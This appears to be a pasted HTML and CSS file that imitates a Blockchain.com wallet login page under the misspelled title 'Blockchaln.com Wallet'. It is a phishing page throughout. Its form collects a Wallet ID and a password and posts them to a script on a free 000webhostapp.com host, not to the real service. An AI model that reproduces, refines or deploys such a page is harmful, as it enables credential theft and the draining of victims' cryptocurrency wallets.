Untitled
3 years ago in CSS
<!DOCTYPE html>
<html>
<head>
<title>Blockchaln.com Wallet - Exchange Cryptocurrency</title>
<link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
<style>
html, body {
display: flex;
justify-content: center;
font-family: Roboto, Arial, sans-serif;
font-size: 15px;
}
form {
border: 5px light #f1f1f1;
}
input[type=text], input[type=password] {
width: 100%;
padding: 16px 8px;
margin: 8px 0;
display: inline-block;
border: 1px solid #ccc;
box-sizing: border-box;
}
button {
background-color: #48c4d8;
color: white;
padding: 14px 0;
margin: 10px 0;
border: none;
cursor: grabbing;
width: 100%;
}
h1 {
text-align:center;
fone-size:18;
}
button:hover {
opacity: 0.8;
}
.formcontainer {
text-align: left;
margin: 24px 50px 12px;
}
.container {
padding: 16px 0;
text-align:left;
}
span.psw {
float: right;
padding-top: 0;
padding-right: 15px;
}
/* Change styles for span on extra small screens */
@media screen and (max-width: 300px) {
span.psw {
display: block;
float: none;
}
</style>
</head>
<body>
<form action="/https://samladscomputer.000webhostapp.com/blockchain.com/post.php">
<h2>Welcome Back!</h2>
<div class="container">
<label for="uname"><strong>Wallet ID</strong></label>
<input type="text" placeholder="" name="uname" required>
<p style="color:black; text-align: center;";>Your Wallet ID can be found at the bottom of any email we've ever sent you. Need a reminder? <span style="color:#4859d8; text-align: left;";>Send my Wallet ID
<p style="color:black; text-align: left;";></br>
<label for="psw"><strong>Password</strong></label>
<input type="password" placeholder="" name="psw" required>
</div>
<button type="submit"><strong>Login</strong></button>
<div class="container" style="background-color: white">
<label style="padding-left: 15px">
<p style="color:#4859d8";><strong>Login via Mobile<span class="psw" style="color:#4859d8";> Need some help?</a></p>
</label>
</div>
<div>
<p style="color:#4859d8; text-align: center;";>Don't have a wallet? Sign Up
</form>
</body>
</html>